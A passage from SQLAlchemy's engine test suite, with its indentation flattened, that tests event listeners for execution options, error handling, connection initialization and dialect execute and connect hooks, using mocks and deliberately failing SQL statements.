c3 = c2.execution_options(bar="bat")
eq_(c3._execution_options, {"foo": "bar", "bar": "bat"})
eq_(canary, ["execute", "cursor_execute"])
@testing.requires.ad_hoc_engines
def test_generative_engine_event_dispatch(self):
canary = []
def l1(*arg, **kw):
canary.append("l1")
def l2(*arg, **kw):
canary.append("l2")
def l3(*arg, **kw):
canary.append("l3")
eng = engines.testing_engine(
options={"execution_options": {"base": "x1"}}
)
event.listen(eng, "before_execute", l1)
eng1 = eng.execution_options(foo="b1")
event.listen(eng, "before_execute", l2)
event.listen(eng1, "before_execute", l3)
with eng.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l1", "l2"])
with eng1.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l1", "l2", "l3", "l1", "l2"])
@testing.requires.ad_hoc_engines
def test_clslevel_engine_event_options(self):
canary = []
def l1(*arg, **kw):
canary.append("l1")
def l2(*arg, **kw):
canary.append("l2")
def l3(*arg, **kw):
canary.append("l3")
def l4(*arg, **kw):
canary.append("l4")
event.listen(Engine, "before_execute", l1)
eng = engines.testing_engine(
options={"execution_options": {"base": "x1"}}
)
event.listen(eng, "before_execute", l2)
eng1 = eng.execution_options(foo="b1")
event.listen(eng, "before_execute", l3)
event.listen(eng1, "before_execute", l4)
with eng.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l1", "l2", "l3"])
with eng1.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l1", "l2", "l3", "l4", "l1", "l2", "l3"])
canary[:] = []
event.remove(Engine, "before_execute", l1)
event.remove(eng1, "before_execute", l4)
event.remove(eng, "before_execute", l3)
with eng1.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l2"])
@testing.requires.ad_hoc_engines
def test_cant_listen_to_option_engine(self):
from sqlalchemy.engine import base
def evt(*arg, **kw):
pass
assert_raises_message(
tsa.exc.InvalidRequestError,
r"Can't assign an event directly to the "
"<class 'sqlalchemy.engine.base.OptionEngine'> class",
event.listen,
base.OptionEngine,
"before_cursor_execute",
evt,
)
@testing.requires.ad_hoc_engines
def test_dispose_event(self, testing_engine):
canary = Mock()
eng = testing_engine(testing.db.url)
event.listen(eng, "engine_disposed", canary)
conn = eng.connect()
conn.close()
eng.dispose()
conn = eng.connect()
conn.close()
eq_(canary.mock_calls, [call(eng)])
eng.dispose()
eq_(canary.mock_calls, [call(eng), call(eng)])
@testing.requires.ad_hoc_engines
@testing.combinations(True, False, argnames="close")
def test_close_parameter(self, testing_engine, close):
eng = testing_engine(
options=dict(pool_size=1, max_overflow=0, poolclass=QueuePool)
)
conn = eng.connect()
dbapi_conn_one = conn.connection.dbapi_connection
conn.close()
eng_copy = copy.copy(eng)
eng_copy.dispose(close=close)
copy_conn = eng_copy.connect()
dbapi_conn_two = copy_conn.connection.dbapi_connection
is_not(dbapi_conn_one, dbapi_conn_two)
conn = eng.connect()
if close:
is_not(dbapi_conn_one, conn.connection.dbapi_connection)
else:
is_(dbapi_conn_one, conn.connection.dbapi_connection)
def test_retval_flag(self):
canary = []
def tracker(name):
def go(conn, *args, **kw):
canary.append(name)
return go
def execute(
conn, clauseelement, multiparams, params, execution_options
):
canary.append("execute")
return clauseelement, multiparams, params
def cursor_execute(
conn, cursor, statement, parameters, context, executemany
):
canary.append("cursor_execute")
return statement, parameters
engine = engines.testing_engine()
assert_raises(
tsa.exc.ArgumentError,
event.listen,
engine,
"begin",
tracker("begin"),
retval=True,
)
event.listen(engine, "before_execute", execute, retval=True)
event.listen(
engine, "before_cursor_execute", cursor_execute, retval=True
)
with engine.connect() as conn:
conn.execute(select(1))
eq_(canary, ["execute", "cursor_execute"])
def test_execution_options(self):
engine = engines.testing_engine()
engine_tracker = Mock()
conn_tracker = Mock()
event.listen(engine, "set_engine_execution_options", engine_tracker)
event.listen(engine, "set_connection_execution_options", conn_tracker)
e2 = engine.execution_options(e1="opt_e1")
c1 = engine.connect()
c2 = c1.execution_options(c1="opt_c1")
c3 = e2.connect()
c4 = c3.execution_options(c3="opt_c3")
eq_(engine_tracker.mock_calls, [call(e2, {"e1": "opt_e1"})])
eq_(
conn_tracker.mock_calls,
[call(c2, {"c1": "opt_c1"}), call(c4, {"c3": "opt_c3"})],
)
def test_execution_options_modify_inplace(self):
engine = engines.testing_engine()
@event.listens_for(engine, "set_engine_execution_options")
def engine_tracker(conn, opt):
opt["engine_tracked"] = True
@event.listens_for(engine, "set_connection_execution_options")
def conn_tracker(conn, opt):
opt["conn_tracked"] = True
with mock.patch.object(
engine.dialect, "set_connection_execution_options"
) as conn_opt, mock.patch.object(
engine.dialect, "set_engine_execution_options"
) as engine_opt:
e2 = engine.execution_options(e1="opt_e1")
c1 = engine.connect()
c2 = c1.execution_options(c1="opt_c1")
is_not(e2, engine)
is_(c1, c2)
eq_(e2._execution_options, {"e1": "opt_e1", "engine_tracked": True})
eq_(c2._execution_options, {"c1": "opt_c1", "conn_tracked": True})
eq_(
engine_opt.mock_calls,
[mock.call(e2, {"e1": "opt_e1", "engine_tracked": True})],
)
eq_(
conn_opt.mock_calls,
[mock.call(c1, {"c1": "opt_c1", "conn_tracked": True})],
)
@testing.requires.sequences
@testing.provide_metadata
def test_cursor_execute(self):
canary = []
def tracker(name):
def go(conn, cursor, statement, parameters, context, executemany):
canary.append((statement, context))
return go
engine = engines.testing_engine()
t = Table(
"t",
self.metadata,
Column(
"x",
Integer,
Sequence("t_id_seq"),
primary_key=True,
),
implicit_returning=False,
)
self.metadata.create_all(engine)
with engine.begin() as conn:
event.listen(
conn, "before_cursor_execute", tracker("cursor_execute")
)
conn.execute(t.insert())
# we see the sequence pre-executed in the first call
assert "t_id_seq" in canary[0][0]
assert "INSERT" in canary[1][0]
# same context
is_(canary[0][1], canary[1][1])
def test_transactional(self):
canary = []
def tracker(name):
def go(conn, *args, **kw):
canary.append(name)
return go
engine = engines.testing_engine()
event.listen(engine, "before_execute", tracker("execute"))
event.listen(
engine, "before_cursor_execute", tracker("cursor_execute")
)
event.listen(engine, "begin", tracker("begin"))
event.listen(engine, "commit", tracker("commit"))
event.listen(engine, "rollback", tracker("rollback"))
with engine.connect() as conn:
trans = conn.begin()
conn.execute(select(1))
trans.rollback()
trans = conn.begin()
conn.execute(select(1))
trans.commit()
eq_(
canary,
[
"begin",
"execute",
"cursor_execute",
"rollback",
"begin",
"execute",
"cursor_execute",
"commit",
],
)
def test_transactional_named(self):
canary = []
def tracker(name):
def go(*args, **kw):
canary.append((name, set(kw)))
return go
engine = engines.testing_engine()
event.listen(engine, "before_execute", tracker("execute"), named=True)
event.listen(
engine,
"before_cursor_execute",
tracker("cursor_execute"),
named=True,
)
event.listen(engine, "begin", tracker("begin"), named=True)
event.listen(engine, "commit", tracker("commit"), named=True)
event.listen(engine, "rollback", tracker("rollback"), named=True)
with engine.connect() as conn:
trans = conn.begin()
conn.execute(select(1))
trans.rollback()
trans = conn.begin()
conn.execute(select(1))
trans.commit()
eq_(
canary,
[
("begin", set(["conn"])),
(
"execute",
set(
[
"conn",
"clauseelement",
"multiparams",
"params",
"execution_options",
]
),
),
(
"cursor_execute",
set(
[
"conn",
"cursor",
"executemany",
"statement",
"parameters",
"context",
]
),
),
("rollback", set(["conn"])),
("begin", set(["conn"])),
(
"execute",
set(
[
"conn",
"clauseelement",
"multiparams",
"params",
"execution_options",
]
),
),
(
"cursor_execute",
set(
[
"conn",
"cursor",
"executemany",
"statement",
"parameters",
"context",
]
),
),
("commit", set(["conn"])),
],
)
@testing.requires.savepoints
@testing.requires.two_phase_transactions
def test_transactional_advanced(self):
canary1 = []
def tracker1(name):
def go(*args, **kw):
canary1.append(name)
return go
canary2 = []
def tracker2(name):
def go(*args, **kw):
canary2.append(name)
return go
engine = engines.testing_engine()
for name in [
"begin",
"savepoint",
"rollback_savepoint",
"release_savepoint",
"rollback",
"begin_twophase",
"prepare_twophase",
"commit_twophase",
]:
event.listen(engine, "%s" % name, tracker1(name))
conn = engine.connect()
for name in [
"begin",
"savepoint",
"rollback_savepoint",
"release_savepoint",
"rollback",
"begin_twophase",
"prepare_twophase",
"commit_twophase",
]:
event.listen(conn, "%s" % name, tracker2(name))
trans = conn.begin()
trans2 = conn.begin_nested()
conn.execute(select(1))
trans2.rollback()
trans2 = conn.begin_nested()
conn.execute(select(1))
trans2.commit()
trans.rollback()
trans = conn.begin_twophase()
conn.execute(select(1))
trans.prepare()
trans.commit()
eq_(
canary1,
[
"begin",
"savepoint",
"rollback_savepoint",
"savepoint",
"release_savepoint",
"rollback",
"begin_twophase",
"prepare_twophase",
"commit_twophase",
],
)
eq_(
canary2,
[
"begin",
"savepoint",
"rollback_savepoint",
"savepoint",
"release_savepoint",
"rollback",
"begin_twophase",
"prepare_twophase",
"commit_twophase",
],
)
class HandleErrorTest(fixtures.TestBase):
__requires__ = ("ad_hoc_engines",)
__backend__ = True
def teardown_test(self):
Engine.dispatch._clear()
Engine._has_events = False
def test_handle_error(self):
engine = engines.testing_engine()
canary = Mock(return_value=None)
event.listen(engine, "handle_error", canary)
with engine.connect() as conn:
try:
conn.exec_driver_sql("SELECT FOO FROM I_DONT_EXIST")
assert False
except tsa.exc.DBAPIError as e:
ctx = canary.mock_calls[0][1][0]
eq_(ctx.original_exception, e.orig)
is_(ctx.sqlalchemy_exception, e)
eq_(ctx.statement, "SELECT FOO FROM I_DONT_EXIST")
def test_exception_event_reraise(self):
engine = engines.testing_engine()
class MyException(Exception):
pass
@event.listens_for(engine, "handle_error", retval=True)
def err(context):
stmt = context.statement
exception = context.original_exception
if "ERROR ONE" in str(stmt):
return MyException("my exception")
elif "ERROR TWO" in str(stmt):
return exception
else:
return None
conn = engine.connect()
# case 1: custom exception
assert_raises_message(
MyException,
"my exception",
conn.exec_driver_sql,
"SELECT 'ERROR ONE' FROM I_DONT_EXIST",
)
# case 2: return the DBAPI exception we're given;
# no wrapping should occur
assert_raises(
conn.dialect.dbapi.Error,
conn.exec_driver_sql,
"SELECT 'ERROR TWO' FROM I_DONT_EXIST",
)
# case 3: normal wrapping
assert_raises(
tsa.exc.DBAPIError,
conn.exec_driver_sql,
"SELECT 'ERROR THREE' FROM I_DONT_EXIST",
)
def test_exception_event_reraise_chaining(self):
engine = engines.testing_engine()
class MyException1(Exception):
pass
class MyException2(Exception):
pass
class MyException3(Exception):
pass
@event.listens_for(engine, "handle_error", retval=True)
def err1(context):
stmt = context.statement
if (
"ERROR ONE" in str(stmt)
or "ERROR TWO" in str(stmt)
or "ERROR THREE" in str(stmt)
):
return MyException1("my exception")
elif "ERROR FOUR" in str(stmt):
raise MyException3("my exception short circuit")
@event.listens_for(engine, "handle_error", retval=True)
def err2(context):
stmt = context.statement
if (
"ERROR ONE" in str(stmt) or "ERROR FOUR" in str(stmt)
) and isinstance(context.chained_exception, MyException1):
raise MyException2("my exception chained")
elif "ERROR TWO" in str(stmt):
return context.chained_exception
else:
return None
conn = engine.connect()
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
assert_raises_message(
MyException2,
"my exception chained",
conn.exec_driver_sql,
"SELECT 'ERROR ONE' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
assert_raises(
MyException1,
conn.exec_driver_sql,
"SELECT 'ERROR TWO' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
# test that non None from err1 isn't cancelled out
# by err2
assert_raises(
MyException1,
conn.exec_driver_sql,
"SELECT 'ERROR THREE' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
assert_raises(
tsa.exc.DBAPIError,
conn.exec_driver_sql,
"SELECT 'ERROR FIVE' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
assert_raises_message(
MyException3,
"my exception short circuit",
conn.exec_driver_sql,
"SELECT 'ERROR FOUR' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
@testing.only_on("sqlite", "using specific DB message")
def test_exception_no_autorollback(self):
"""with the 2.0 engine, a SQL statement will have run
"autobegin", so that we are in a transaction. so if an error
occurs, we report the error but stay in the transaction.
previously, we'd see the rollback failing due to autorollback
when transaction isn't started.
"""
engine = engines.testing_engine()
conn = engine.connect()
def boom(connection):
raise engine.dialect.dbapi.OperationalError("rollback failed")
with patch.object(conn.dialect, "do_rollback", boom):
assert_raises_message(
tsa.exc.OperationalError,
"no such table: i_dont_exist",
conn.exec_driver_sql,
"insert into i_dont_exist (x) values ('y')",
)
# we're still in a transaction
assert conn._transaction
# only fails when we actually call rollback
assert_raises_message(
tsa.exc.OperationalError,
"rollback failed",
conn.rollback,
)
def test_actual_autorollback(self):
"""manufacture an autorollback scenario that works in 2.x."""
engine = engines.testing_engine()
conn = engine.connect()
def boom(connection):
raise engine.dialect.dbapi.OperationalError("rollback failed")
@event.listens_for(conn, "begin")
def _do_begin(conn):
# run a breaking statement before begin actually happens
conn.exec_driver_sql("insert into i_dont_exist (x) values ('y')")
with patch.object(conn.dialect, "do_rollback", boom):
assert_raises_message(
tsa.exc.OperationalError,
"rollback failed",
conn.begin,
)
def test_exception_event_ad_hoc_context(self):
"""test that handle_error is called with a context in
cases where _handle_dbapi_error() is normally called without
any context.
"""
engine = engines.testing_engine()
listener = Mock(return_value=None)
event.listen(engine, "handle_error", listener)
nope = SomeException("nope")
class MyType(TypeDecorator):
impl = Integer
cache_ok = True
def process_bind_param(self, value, dialect):
raise nope
with engine.connect() as conn:
assert_raises_message(
tsa.exc.StatementError,
r"\(.*.SomeException\) " r"nope\n\[SQL\: u?SELECT 1 ",
conn.execute,
select(1).where(column("foo") == literal("bar", MyType())),
)
ctx = listener.mock_calls[0][1][0]
assert ctx.statement.startswith("SELECT 1 ")
is_(ctx.is_disconnect, False)
is_(ctx.original_exception, nope)
def test_exception_event_non_dbapi_error(self):
"""test that handle_error is called with a context in
cases where DBAPI raises an exception that is not a DBAPI
exception, e.g. internal errors or encoding problems.
"""
engine = engines.testing_engine()
listener = Mock(return_value=None)
event.listen(engine, "handle_error", listener)
nope = TypeError("I'm not a DBAPI error")
with engine.connect() as c:
c.connection.cursor = Mock(
return_value=Mock(execute=Mock(side_effect=nope))
)
assert_raises_message(
TypeError,
"I'm not a DBAPI error",
c.exec_driver_sql,
"select ",
)
ctx = listener.mock_calls[0][1][0]
eq_(ctx.statement, "select ")
is_(ctx.is_disconnect, False)
is_(ctx.original_exception, nope)
def test_exception_event_disable_handlers(self):
engine = engines.testing_engine()
class MyException1(Exception):
pass
@event.listens_for(engine, "handle_error")
def err1(context):
stmt = context.statement
if "ERROR_ONE" in str(stmt):
raise MyException1("my exception short circuit")
with engine.connect() as conn:
assert_raises(
tsa.exc.DBAPIError,
conn.execution_options(
skip_user_error_events=True
).exec_driver_sql,
"SELECT ERROR_ONE FROM I_DONT_EXIST",
)
assert_raises(
MyException1,
conn.execution_options(
skip_user_error_events=False
).exec_driver_sql,
"SELECT ERROR_ONE FROM I_DONT_EXIST",
)
def _test_alter_disconnect(self, orig_error, evt_value):
engine = engines.testing_engine()
@event.listens_for(engine, "handle_error")
def evt(ctx):
ctx.is_disconnect = evt_value
with patch.object(
engine.dialect, "is_disconnect", Mock(return_value=orig_error)
):
with engine.connect() as c:
try:
c.exec_driver_sql("SELECT x FROM nonexistent")
assert False
except tsa.exc.StatementError as st:
eq_(st.connection_invalidated, evt_value)
def test_alter_disconnect_to_true(self):
self._test_alter_disconnect(False, True)
self._test_alter_disconnect(True, True)
def test_alter_disconnect_to_false(self):
self._test_alter_disconnect(True, False)
self._test_alter_disconnect(False, False)
@testing.requires.independent_connections
def _test_alter_invalidate_pool_to_false(self, set_to_false):
orig_error = True
engine = engines.testing_engine()
@event.listens_for(engine, "handle_error")
def evt(ctx):
if set_to_false:
ctx.invalidate_pool_on_disconnect = False
c1, c2, c3 = (
engine.pool.connect(),
engine.pool.connect(),
engine.pool.connect(),
)
crecs = [conn._connection_record for conn in (c1, c2, c3)]
c1.close()
c2.close()
c3.close()
with patch.object(
engine.dialect, "is_disconnect", Mock(return_value=orig_error)
):
with engine.connect() as c:
target_crec = c.connection._connection_record
try:
c.exec_driver_sql("SELECT x FROM nonexistent")
assert False
except tsa.exc.StatementError as st:
eq_(st.connection_invalidated, True)
for crec in crecs:
if crec is target_crec or not set_to_false:
is_not(crec.dbapi_connection, crec.get_connection())
else:
is_(crec.dbapi_connection, crec.get_connection())
def test_alter_invalidate_pool_to_false(self):
self._test_alter_invalidate_pool_to_false(True)
def test_alter_invalidate_pool_stays_true(self):
self._test_alter_invalidate_pool_to_false(False)
def test_handle_error_event_connect_isolation_level(self):
engine = engines.testing_engine()
class MySpecialException(Exception):
pass
@event.listens_for(engine, "handle_error")
def handle_error(ctx):
raise MySpecialException("failed operation")
ProgrammingError = engine.dialect.dbapi.ProgrammingError
with engine.connect() as conn:
with patch.object(
conn.dialect,
"get_isolation_level",
Mock(side_effect=ProgrammingError("random error")),
):
assert_raises(MySpecialException, conn.get_isolation_level)
@testing.only_on("sqlite+pysqlite")
def test_cursor_close_resultset_failed_connectionless(self):
engine = engines.testing_engine()
the_conn = []
the_cursor = []
@event.listens_for(engine, "after_cursor_execute")
def go(
connection, cursor, statement, parameters, context, executemany
):
the_cursor.append(cursor)
the_conn.append(connection)
with mock.patch(
"sqlalchemy.engine.cursor.CursorResult.__init__",
Mock(side_effect=tsa.exc.InvalidRequestError("duplicate col")),
):
with engine.connect() as conn:
assert_raises(
tsa.exc.InvalidRequestError,
conn.execute,
text("select 1"),
)
# cursor is closed
assert_raises_message(
engine.dialect.dbapi.ProgrammingError,
"Cannot operate on a closed cursor",
the_cursor[0].execute,
"select 1",
)
# connection is closed
assert the_conn[0].closed
@testing.only_on("sqlite+pysqlite")
def test_cursor_close_resultset_failed_explicit(self):
engine = engines.testing_engine()
the_cursor = []
@event.listens_for(engine, "after_cursor_execute")
def go(
connection, cursor, statement, parameters, context, executemany
):
the_cursor.append(cursor)
conn = engine.connect()
with mock.patch(
"sqlalchemy.engine.cursor.CursorResult.__init__",
Mock(side_effect=tsa.exc.InvalidRequestError("duplicate col")),
):
assert_raises(
tsa.exc.InvalidRequestError,
conn.execute,
text("select 1"),
)
# cursor is closed
assert_raises_message(
engine.dialect.dbapi.ProgrammingError,
"Cannot operate on a closed cursor",
the_cursor[0].execute,
"select 1",
)
# connection not closed
assert not conn.closed
conn.close()
class OnConnectTest(fixtures.TestBase):
__requires__ = ("sqlite",)
def setup_test(self):
e = create_engine("sqlite://")
connection = Mock(get_server_version_info=Mock(return_value="5.0"))
def connect(*args, **kwargs):
return connection
dbapi = Mock(
sqlite_version_info=(99, 9, 9),
version_info=(99, 9, 9),
sqlite_version="99.9.9",
paramstyle="named",
connect=Mock(side_effect=connect),
)
sqlite3 = e.dialect.dbapi
dbapi.Error = (sqlite3.Error,)
dbapi.ProgrammingError = sqlite3.ProgrammingError
self.dbapi = dbapi
self.ProgrammingError = sqlite3.ProgrammingError
def test_wraps_connect_in_dbapi(self):
dbapi = self.dbapi
dbapi.connect = Mock(side_effect=self.ProgrammingError("random error"))
try:
create_engine("sqlite://", module=dbapi).connect()
assert False
except tsa.exc.DBAPIError as de:
assert not de.connection_invalidated
def test_handle_error_event_connect(self):
dbapi = self.dbapi
dbapi.connect = Mock(side_effect=self.ProgrammingError("random error"))
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://", module=dbapi)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.engine is eng
assert ctx.connection is None
raise MySpecialException("failed operation")
assert_raises(MySpecialException, eng.connect)
def test_handle_error_event_revalidate(self):
dbapi = self.dbapi
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://", module=dbapi, _initialize=False)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.engine is eng
assert ctx.connection is conn
assert isinstance(
ctx.sqlalchemy_exception, tsa.exc.ProgrammingError
)
raise MySpecialException("failed operation")
conn = eng.connect()
conn.invalidate()
dbapi.connect = Mock(side_effect=self.ProgrammingError("random error"))
assert_raises(MySpecialException, getattr, conn, "connection")
def test_handle_error_event_implicit_revalidate(self):
dbapi = self.dbapi
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://", module=dbapi, _initialize=False)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.engine is eng
assert ctx.connection is conn
assert isinstance(
ctx.sqlalchemy_exception, tsa.exc.ProgrammingError
)
raise MySpecialException("failed operation")
conn = eng.connect()
conn.invalidate()
dbapi.connect = Mock(side_effect=self.ProgrammingError("random error"))
assert_raises(MySpecialException, conn.execute, select(1))
def test_handle_error_custom_connect(self):
dbapi = self.dbapi
class MySpecialException(Exception):
pass
def custom_connect():
raise self.ProgrammingError("random error")
eng = create_engine("sqlite://", module=dbapi, creator=custom_connect)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.engine is eng
assert ctx.connection is None
raise MySpecialException("failed operation")
assert_raises(MySpecialException, eng.connect)
def test_handle_error_event_connect_invalidate_flag(self):
dbapi = self.dbapi
dbapi.connect = Mock(
side_effect=self.ProgrammingError(
"Cannot operate on a closed database."
)
)
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://", module=dbapi)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.is_disconnect
ctx.is_disconnect = False
try:
eng.connect()
assert False
except tsa.exc.DBAPIError as de:
assert not de.connection_invalidated
def test_cant_connect_stay_invalidated(self):
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://")
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.is_disconnect
conn = eng.connect()
conn.invalidate()
eng.pool._creator = Mock(
side_effect=self.ProgrammingError(
"Cannot operate on a closed database."
)
)
try:
conn.connection
assert False
except tsa.exc.DBAPIError:
assert conn.invalidated
def test_dont_touch_non_dbapi_exception_on_connect(self):
dbapi = self.dbapi
dbapi.connect = Mock(side_effect=TypeError("I'm not a DBAPI error"))
e = create_engine("sqlite://", module=dbapi)
e.dialect.is_disconnect = is_disconnect = Mock()
assert_raises_message(TypeError, "I'm not a DBAPI error", e.connect)
eq_(is_disconnect.call_count, 0)
def test_ensure_dialect_does_is_disconnect_no_conn(self):
"""test that is_disconnect() doesn't choke if no connection,
cursor given."""
dialect = testing.db.dialect
dbapi = dialect.dbapi
assert not dialect.is_disconnect(
dbapi.OperationalError("test"), None, None
)
def test_dont_create_transaction_on_initialize(self):
"""test that engine init doesn't invoke autobegin.
this happened implicitly in 1.4 due to use of a non-future
connection for initialize.
to fix for 2.0 we added a new flag _allow_autobegin=False
for init purposes only.
"""
e = create_engine("sqlite://")
init_connection = None
def mock_initialize(connection):
# definitely trigger what would normally be an autobegin
connection.execute(select(1))
nonlocal init_connection
init_connection = connection
with mock.patch.object(
e._connection_cls, "begin"
) as mock_begin, mock.patch.object(
e.dialect, "initialize", Mock(side_effect=mock_initialize)
) as mock_init:
conn = e.connect()
eq_(mock_begin.mock_calls, [])
is_not(init_connection, None)
is_not(conn, init_connection)
is_false(init_connection._allow_autobegin)
eq_(mock_init.mock_calls, [mock.call(init_connection)])
# assert the mock works too
conn.begin()
eq_(mock_begin.mock_calls, [mock.call()])
conn.close()
def test_invalidate_on_connect(self):
"""test that is_disconnect() is called during connect.
interpretation of connection failures are not supported by
every backend.
"""
dbapi = self.dbapi
dbapi.connect = Mock(
side_effect=self.ProgrammingError(
"Cannot operate on a closed database."
)
)
e = create_engine("sqlite://", module=dbapi)
try:
e.connect()
assert False
except tsa.exc.DBAPIError as de:
assert de.connection_invalidated
@testing.only_on("sqlite+pysqlite")
def test_initialize_connect_calls(self):
"""test for :ticket:`5497`, on_connect not called twice"""
m1 = Mock()
cls_ = testing.db.dialect.__class__
class SomeDialect(cls_):
def initialize(self, connection):
super(SomeDialect, self).initialize(connection)
m1.initialize(connection)
def on_connect(self):
oc = super(SomeDialect, self).on_connect()
def my_on_connect(conn):
if oc:
oc(conn)
m1.on_connect(conn)
return my_on_connect
u1 = Mock(
username=None,
password=None,
host=None,
port=None,
query={},
database=None,
_instantiate_plugins=lambda kw: (u1, [], kw),
_get_entrypoint=Mock(
return_value=Mock(get_dialect_cls=lambda u: SomeDialect)
),
)
eng = create_engine(u1, poolclass=QueuePool)
# make sure other dialects aren't getting pulled in here
eq_(eng.name, "sqlite")
c = eng.connect()
dbapi_conn_one = c.connection.dbapi_connection
c.close()
eq_(
m1.mock_calls,
[call.on_connect(dbapi_conn_one), call.initialize(mock.ANY)],
)
c = eng.connect()
eq_(
m1.mock_calls,
[call.on_connect(dbapi_conn_one), call.initialize(mock.ANY)],
)
c2 = eng.connect()
dbapi_conn_two = c2.connection.dbapi_connection
is_not(dbapi_conn_one, dbapi_conn_two)
eq_(
m1.mock_calls,
[
call.on_connect(dbapi_conn_one),
call.initialize(mock.ANY),
call.on_connect(dbapi_conn_two),
],
)
c.close()
c2.close()
@testing.only_on("sqlite+pysqlite")
def test_initialize_connect_race(self):
"""test for :ticket:`6337` fixing the regression in :ticket:`5497`,
dialect init is mutexed"""
m1 = []
cls_ = testing.db.dialect.__class__
class SomeDialect(cls_):
supports_statement_cache = True
def initialize(self, connection):
super(SomeDialect, self).initialize(connection)
m1.append("initialize")
def on_connect(self):
oc = super(SomeDialect, self).on_connect()
def my_on_connect(conn):
if oc:
oc(conn)
m1.append("on_connect")
return my_on_connect
u1 = Mock(
username=None,
password=None,
host=None,
port=None,
query={},
database=None,
_instantiate_plugins=lambda kw: (u1, [], kw),
_get_entrypoint=Mock(
return_value=Mock(get_dialect_cls=lambda u: SomeDialect)
),
)
for j in range(5):
m1[:] = []
eng = create_engine(
u1,
poolclass=NullPool,
connect_args={"check_same_thread": False},
)
def go():
c = eng.connect()
c.execute(text("select 1"))
c.close()
threads = [threading.Thread(target=go) for i in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
eq_(m1, ["on_connect", "initialize"] + ["on_connect"] * 9)
class DialectEventTest(fixtures.TestBase):
@contextmanager
def _run_test(self, retval):
m1 = Mock()
m1.do_execute.return_value = retval
m1.do_executemany.return_value = retval
m1.do_execute_no_params.return_value = retval
e = engines.testing_engine(options={"_initialize": False})
event.listen(e, "do_execute", m1.do_execute)
event.listen(e, "do_executemany", m1.do_executemany)
event.listen(e, "do_execute_no_params", m1.do_execute_no_params)
e.dialect.do_execute = m1.real_do_execute
e.dialect.do_executemany = m1.real_do_executemany
e.dialect.do_execute_no_params = m1.real_do_execute_no_params
def mock_the_cursor(cursor, *arg):
arg[-1].get_result_proxy = Mock(return_value=Mock(context=arg[-1]))
return retval
m1.real_do_execute.side_effect = (
m1.do_execute.side_effect
) = mock_the_cursor
m1.real_do_executemany.side_effect = (
m1.do_executemany.side_effect
) = mock_the_cursor
m1.real_do_execute_no_params.side_effect = (
m1.do_execute_no_params.side_effect
) = mock_the_cursor
with e.begin() as conn:
yield conn, m1
def _assert(self, retval, m1, m2, mock_calls):
eq_(m1.mock_calls, mock_calls)
if retval:
eq_(m2.mock_calls, [])
else:
eq_(m2.mock_calls, mock_calls)
def _test_do_execute(self, retval):
with self._run_test(retval) as (conn, m1):
result = conn.exec_driver_sql(
"insert into table foo", {"foo": "bar"}
)
self._assert(
retval,
m1.do_execute,
m1.real_do_execute,
[
call(
result.context.cursor,
"insert into table foo",
{"foo": "bar"},
result.context,
)
],
)
def _test_do_executemany(self, retval):
with self._run_test(retval) as (conn, m1):
result = conn.exec_driver_sql(
"insert into table foo", [{"foo": "bar"}, {"foo": "bar"}]
)
self._assert(
retval,
m1.do_executemany,
m1.real_do_executemany,
[
call(
result.context.cursor,
"insert into table foo",
[{"foo": "bar"}, {"foo": "bar"}],
result.context,
)
],
)
def _test_do_execute_no_params(self, retval):
with self._run_test(retval) as (conn, m1):
result = conn.execution_options(
no_parameters=True
).exec_driver_sql("insert into table foo")
self._assert(
retval,
m1.do_execute_no_params,
m1.real_do_execute_no_params,
[
call(
result.context.cursor,
"insert into table foo",
result.context,
)
],
)
def _test_cursor_execute(self, retval):
with self._run_test(retval) as (conn, m1):
dialect = conn.dialect
stmt = "insert into table foo"
params = {"foo": "bar"}
ctx = dialect.execution_ctx_cls._init_statement(
dialect,
conn,
conn.connection,
{},
stmt,
[params],
)
conn._cursor_execute(ctx.cursor, stmt, params, ctx)
self._assert(
retval,
m1.do_execute,
m1.real_do_execute,
[call(ctx.cursor, "insert into table foo", {"foo": "bar"}, ctx)],
)
def test_do_execute_w_replace(self):
self._test_do_execute(True)
def test_do_execute_wo_replace(self):
self._test_do_execute(False)
def test_do_executemany_w_replace(self):
self._test_do_executemany(True)
def test_do_executemany_wo_replace(self):
self._test_do_executemany(False)
def test_do_execute_no_params_w_replace(self):
self._test_do_execute_no_params(True)
def test_do_execute_no_params_wo_replace(self):
self._test_do_execute_no_params(False)
def test_cursor_execute_w_replace(self):
self._test_cursor_execute(True)
def test_cursor_execute_wo_replace(self):
self._test_cursor_execute(False)
def test_connect_replace_params(self):
e = engines.testing_engine(options={"_initialize": False})
@event.listens_for(e, "do_connect")
def evt(dialect, conn_rec, cargs, cparams):
cargs[:] = ["foo", "hoho"]
cparams.clear()
cparams["bar"] = "bat"
conn_rec.info["boom"] = "bap"
m1 = Mock()
e.dialect.connect = m1.real_connect
with e.connect() as conn:
eq_(m1.mock_calls, [call.real_connect("foo", "hoho", bar="bat")])
eq_(conn.info["boom"], "bap")
def test_connect_do_connect(self):
e = engines.testing_engine(options={"_initialize": False})
m1 = Mock()
@event.listens_for(e, "do_connect")
